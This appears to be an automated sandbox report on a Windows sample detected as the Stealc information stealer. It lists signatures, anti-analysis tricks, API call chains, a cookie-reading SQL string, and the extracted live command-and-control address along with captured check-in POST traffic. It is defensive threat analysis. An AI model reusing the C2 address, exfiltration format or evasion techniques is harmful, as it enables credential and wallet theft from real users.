
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561860
MD5: 63467d79a3f868e98b2560394e80345f
SHA1: fc3bca2a34ae3511f229f34483471a3804c4c24e
SHA256: dbc2fd08e4e008755e38c372dfca2d459535a27df0c9ee97abeed7fb186a42a3
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4576 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 63467D79A3F868E98B2560394E80345F)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2189567754.0000000004B00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 4576 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 4576 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-11-24T14:56:18.703528+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49723 | 185.215.113.206 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpu9 | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpI9 | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpy9 | Avira URL Cloud: Label: malware
Source: 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D9B80 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49723 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFI
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data (210 bytes, decoded from the raw hex; every line ends in CRLF):
    ------CAEHCFCBKKJDGCAKFCFI
    Content-Disposition: form-data; name="hwid"

    F5D0E3425485302599741
    ------CAEHCFCBKKJDGCAKFCFI
    Content-Disposition: form-data; name="build"

    mars
    ------CAEHCFCBKKJDGCAKFCFI--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: unknown | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFI
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data (210 bytes, decoded from the raw hex; every line ends in CRLF):
    ------CAEHCFCBKKJDGCAKFCFI
    Content-Disposition: form-data; name="hwid"

    F5D0E3425485302599741
    ------CAEHCFCBKKJDGCAKFCFI
    Content-Disposition: form-data; name="build"

    mars
    ------CAEHCFCBKKJDGCAKFCFI--
Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9
Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpI9
Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpu9
Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy9
Source: file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/p
Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206tD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop

System Summary

Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080C087
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A009A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008768A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F48B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00739105
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007461BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A9278
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088DAAB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00897ABB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0089B2C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091EAC3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008782DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088A387
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A1B61
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0089E4D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088F4D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00894477
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008995BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0072C622
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007AB6F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091EE2D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088BF4F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00895F76
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004D4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: woldotvo ZLIB complexity 0.9947469682835821
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004ECAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\592UF6CX.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
